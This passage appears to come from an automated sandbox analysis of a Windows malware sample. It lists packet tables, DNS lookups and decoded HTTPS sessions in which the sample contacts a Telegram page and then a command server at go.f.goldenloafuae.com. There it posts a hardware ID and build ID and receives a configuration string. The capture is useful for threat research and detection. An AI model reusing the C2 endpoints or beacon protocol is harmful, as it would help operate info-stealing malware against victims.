                                                                                    Mar 7, 2025 20:46:04.794081926 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794095039 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794105053 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794150114 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794162989 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794176102 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794215918 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794260979 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794275045 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794289112 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794332027 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794342995 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794358015 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794369936 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794373989 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794414997 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794431925 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794476986 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794488907 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794524908 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794533014 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794548988 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794604063 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794617891 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794625998 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794634104 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794651985 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794665098 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794697046 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794703007 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794766903 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794786930 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794810057 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794822931 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794868946 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794884920 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794905901 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794924021 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.794936895 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794946909 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.794950962 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.795006990 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.795018911 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.795032024 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.795053005 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.795109034 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:04.795119047 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.795242071 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:04.795645952 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:06.925329924 CET4434975995.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:06.925443888 CET49759443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:06.925942898 CET49759443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:06.925957918 CET4434975995.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:06.928750038 CET49759443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:06.928759098 CET4434975995.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:08.291846991 CET4434975995.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:08.291876078 CET4434975995.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:08.291910887 CET49759443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:08.291927099 CET4434975995.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:08.291939020 CET49759443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:08.291961908 CET49759443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:08.292126894 CET49759443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:08.292171955 CET4434975995.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:08.292217970 CET49759443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:08.294802904 CET49760443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:08.294840097 CET4434976095.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:08.294909954 CET49760443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:08.295099020 CET49760443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:08.295113087 CET4434976095.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:10.567826986 CET4434976095.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:10.568053961 CET49760443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:10.572371960 CET49760443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:10.572403908 CET4434976095.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:10.572770119 CET4434976095.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:10.572834969 CET49760443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:10.573173046 CET49760443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:10.616332054 CET4434976095.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:11.958570957 CET4434976095.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:11.958600044 CET4434976095.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:11.958664894 CET4434976095.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:11.958807945 CET49760443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:11.958807945 CET49760443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:11.958929062 CET49760443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:11.958951950 CET4434976095.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:11.989576101 CET49761443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:11.989641905 CET4434976195.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:11.989715099 CET49761443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:11.989978075 CET49761443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:11.989989996 CET4434976195.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:12.445245981 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:12.445338964 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:12.445364952 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:12.445404053 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:12.446265936 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:12.446332932 CET4434975895.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:12.446391106 CET49758443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:13.929148912 CET4434976195.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:13.929337978 CET49761443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:13.929977894 CET49761443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:13.929989100 CET4434976195.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:13.936331987 CET49761443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:13.936347961 CET4434976195.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:15.084968090 CET4434976195.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:15.085190058 CET49761443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:15.085211039 CET4434976195.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:15.085257053 CET49761443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:15.086200953 CET49761443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:15.086230993 CET4434976195.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:15.086285114 CET49761443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:16.103849888 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:16.103909016 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:16.103988886 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:16.104207993 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:16.104218006 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:18.243115902 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:18.243196011 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:18.247863054 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:18.247875929 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:18.248150110 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:18.248204947 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:18.248574018 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:18.248641014 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:18.248662949 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:18.248714924 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:18.248722076 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:18.248748064 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:18.248800993 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:18.248807907 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:18.248815060 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:18.248840094 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:18.248845100 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:18.248929024 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:18.248949051 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:18.248986959 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:18.248996973 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:18.249063015 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:18.249077082 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:18.249115944 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:18.249126911 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:18.249160051 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:18.249166965 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:20.043332100 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:20.043428898 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:20.043452978 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:20.043495893 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:20.043514967 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:20.043565989 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:20.043716908 CET49762443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:20.043735981 CET4434976295.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:20.076472044 CET49763443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:20.076524019 CET4434976395.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:20.076591969 CET49763443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:20.076878071 CET49763443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:20.076889992 CET4434976395.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:22.147563934 CET4434976395.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:22.148025036 CET49763443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:22.148268938 CET49763443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:22.148281097 CET4434976395.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:22.151609898 CET49763443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:22.151626110 CET4434976395.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:23.681148052 CET4434976395.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:23.681219101 CET49763443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:23.681246996 CET4434976395.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:23.681323051 CET49763443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:23.681538105 CET49763443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:23.681575060 CET4434976395.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:23.681618929 CET49763443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:23.686717033 CET49764443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:23.686753035 CET4434976495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:23.686817884 CET49764443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:23.687202930 CET49764443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:23.687215090 CET4434976495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:24.195655107 CET4972180192.168.2.4142.250.186.131
                                                                                    Mar 7, 2025 20:46:24.200942993 CET8049721142.250.186.131192.168.2.4
                                                                                    Mar 7, 2025 20:46:24.200984001 CET4972180192.168.2.4142.250.186.131
                                                                                    Mar 7, 2025 20:46:26.158376932 CET4434976495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:26.158514023 CET49764443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:26.162709951 CET49764443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:26.162725925 CET4434976495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:26.162976980 CET4434976495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:26.163034916 CET49764443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:26.163444042 CET49764443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:26.208327055 CET4434976495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:27.299211979 CET4434976495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:27.299320936 CET49764443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:27.299343109 CET4434976495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:27.299376965 CET49764443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:27.299488068 CET49764443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:46:27.299523115 CET4434976495.217.27.252192.168.2.4
                                                                                    Mar 7, 2025 20:46:27.299560070 CET49764443192.168.2.495.217.27.252
                                                                                    Mar 7, 2025 20:47:00.276015043 CET4434970852.113.196.254192.168.2.4
                                                                                    Mar 7, 2025 20:47:00.276149988 CET49708443192.168.2.452.113.196.254

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Mar 7, 2025 20:45:09.329121113 CET6523153192.168.2.41.1.1.1
                                                                                    Mar 7, 2025 20:45:09.336410046 CET53652311.1.1.1192.168.2.4
                                                                                    Mar 7, 2025 20:45:13.918410063 CET5023353192.168.2.41.1.1.1
                                                                                    Mar 7, 2025 20:45:13.938060999 CET53502331.1.1.1192.168.2.4
                                                                                    Mar 7, 2025 20:45:41.075170994 CET6052353192.168.2.41.1.1.1
                                                                                    Mar 7, 2025 20:45:41.075280905 CET6052653192.168.2.41.1.1.1
                                                                                    Mar 7, 2025 20:45:41.081289053 CET53620571.1.1.1192.168.2.4
                                                                                    Mar 7, 2025 20:45:41.081744909 CET53506101.1.1.1192.168.2.4
                                                                                    Mar 7, 2025 20:45:41.082252979 CET53605231.1.1.1192.168.2.4
                                                                                    Mar 7, 2025 20:45:41.082478046 CET53605261.1.1.1192.168.2.4
                                                                                    Mar 7, 2025 20:45:44.978867054 CET53589871.1.1.1192.168.2.4
                                                                                    Mar 7, 2025 20:45:45.666665077 CET53507641.1.1.1192.168.2.4
                                                                                    Mar 7, 2025 20:46:14.529633999 CET138138192.168.2.4192.168.2.255

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Mar 7, 2025 20:45:09.329121113 CET192.168.2.41.1.1.10x47faStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 20:45:13.918410063 CET192.168.2.41.1.1.10x298aStandard query (0)go.f.goldenloafuae.comA (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 20:45:41.075170994 CET192.168.2.41.1.1.10xd35dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 20:45:41.075280905 CET192.168.2.41.1.1.10x77e3Standard query (0)www.google.com65IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Mar 7, 2025 20:45:09.336410046 CET1.1.1.1192.168.2.40x47faNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 20:45:13.938060999 CET1.1.1.1192.168.2.40x298aNo error (0)go.f.goldenloafuae.com95.217.27.252A (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 20:45:41.082252979 CET1.1.1.1192.168.2.40xd35dNo error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 20:45:41.082478046 CET1.1.1.1192.168.2.40x77e3No error (0)www.google.com65IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • t.me
                                                                                    • go.f.goldenloafuae.com
                                                                                    • www.google.com
                                                                                    • c.pki.goog

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    0192.168.2.449721142.250.186.13180
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 7, 2025 20:45:22.737577915 CET202OUTGET /r/gsr1.crl HTTP/1.1
                                                                                    Cache-Control: max-age = 3000
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                                                                                    User-Agent: Microsoft-CryptoAPI/10.0
                                                                                    Host: c.pki.goog
                                                                                    Mar 7, 2025 20:45:23.388432026 CET223INHTTP/1.1 304 Not Modified
                                                                                    Date: Fri, 07 Mar 2025 19:10:47 GMT
                                                                                    Expires: Fri, 07 Mar 2025 20:00:47 GMT
                                                                                    Age: 2076
                                                                                    Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
                                                                                    Cache-Control: public, max-age=3000
                                                                                    Vary: Accept-Encoding
                                                                                    Mar 7, 2025 20:45:23.395065069 CET200OUTGET /r/r4.crl HTTP/1.1
                                                                                    Cache-Control: max-age = 3000
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                    User-Agent: Microsoft-CryptoAPI/10.0
                                                                                    Host: c.pki.goog
                                                                                    Mar 7, 2025 20:45:23.578146935 CET223INHTTP/1.1 304 Not Modified
                                                                                    Date: Fri, 07 Mar 2025 19:10:47 GMT
                                                                                    Expires: Fri, 07 Mar 2025 20:00:47 GMT
                                                                                    Age: 2076
                                                                                    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                    Cache-Control: public, max-age=3000
                                                                                    Vary: Accept-Encoding


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449710149.154.167.994437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:11 UTC85OUTGET /l793oy HTTP/1.1
                                                                                    Host: t.me
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:45:13 UTC511INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Fri, 07 Mar 2025 19:45:12 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 12332
                                                                                    Connection: close
                                                                                    Set-Cookie: stel_ssid=4661d92c429881801f_3362287598068471085; expires=Sat, 08 Mar 2025 19:45:12 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                    Pragma: no-cache
                                                                                    Cache-control: no-store
                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                    Strict-Transport-Security: max-age=35768000
                                                                                    2025-03-07 19:45:13 UTC12332INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6c 37 39 33 6f 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @l793oy</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.44971495.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:16 UTC203OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:45:17 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:45:17 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2025-03-07 19:45:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.44971795.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:19 UTC295OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----n790h479zmglf3ecject
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 256
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:45:19 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 6e 37 39 30 68 34 37 39 7a 6d 67 6c 66 33 65 63 6a 65 63 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 33 32 45 31 35 38 34 31 37 37 31 37 35 38 31 38 38 36 38 37 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 6e 37 39 30 68 34 37 39 7a 6d 67 6c 66 33 65 63 6a 65 63 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 6e 37 39 30 68 34 37 39 7a 6d 67 6c 66 33 65 63 6a 65 63 74 2d 2d 0d
                                                                                    Data Ascii: ------n790h479zmglf3ecjectContent-Disposition: form-data; name="hwid"5F32E15841771758188687-a33c7340-61ca------n790h479zmglf3ecjectContent-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------n790h479zmglf3ecject--
                                                                                    2025-03-07 19:45:20 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:45:20 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2025-03-07 19:45:20 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 3a1|1|1|1|879e682bacba23302a9691efabf72633|1|1|1|0|0|50000|10


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.44971895.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:22 UTC295OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----riwtjmycjw47qq1n7gvs
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 331
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
